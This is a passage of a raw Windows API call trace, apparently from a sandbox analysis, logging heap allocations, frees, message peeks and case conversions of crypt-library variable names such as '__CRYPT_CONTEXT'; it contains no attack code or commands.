lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0245.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0245.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0245.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.467] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0245.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.467] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0245.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0245.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0245.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0245.468] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0245.468] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.468] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0245.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0245.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0245.469] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0245.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0245.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0245.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0245.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0245.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0245.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0245.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0245.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0245.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0245.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0245.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.475] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0245.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0245.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.476] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.476] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0245.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0245.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0245.476] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0245.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0245.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0245.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0245.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0245.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0245.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0245.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0245.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0245.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0245.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0245.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0245.539] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0245.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.539] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56028 [0245.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.539] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56028 | out: hHeap=0x970000) returned 1 [0245.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0245.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0245.539] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0245.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0245.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0245.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0245.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0245.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0245.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0245.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0245.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0245.540] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0245.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.540] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0245.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.541] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0245.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0245.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0245.542] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0245.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0245.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0245.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 